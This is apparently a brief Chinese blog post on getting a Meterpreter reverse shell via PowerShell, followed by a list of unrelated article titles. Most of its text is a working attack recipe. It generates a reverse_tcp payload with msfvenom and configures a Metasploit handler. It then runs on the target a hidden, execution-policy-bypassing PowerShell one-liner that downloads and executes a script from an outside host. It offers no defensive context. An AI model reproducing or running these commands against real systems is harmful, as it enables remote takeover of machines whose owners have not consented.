利用powershell反弹shell到metasploit
2024-09-28 15:26:54
一、使用msfvenom生成PS1文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= -f psh-reflection >.ps1
二、开启msf监听:
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost xxx.xxx.xxx.xxx lhost => xxx.xxx.xxx.xxx msf exploit(handler) > set lport xxx lport => xxx msf > run
二、在目标机器执行cmd命令:
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.217.162/7788.ps1');xx.ps1"
注意区分目标及系统是32位还是64位。
最新文章
- 【Codeforces717G】Underfail Hash + 最大费用最大流
- OpenXml入门
- (02)odoo自定义模块
- heritrix启动问题修正
- jsp?echo
- centos7 systemctl grub2
- 《A First Course in Probability》-chaper3-条件概率和独立性-基本公式
- Python Tutorial 学习(四)--More Control Flow Tools
- 使用AlertDialog创建对话框的大致步骤
- Unity3d之流光效果
- 利用python实现简单随机验证码
- 51nod97B 异或约束和
- 【洛谷P1903】数颜色
- reportNG定制化之失败截图及日志
- 最新的vueWebpack项目
- js获取单个查询串的值
- iOS获取网络类型的四种方法
- iOS Reachability检测网络状态
- BZOJ2961: 共点圆(CDQ分治+凸包)
- nohub用法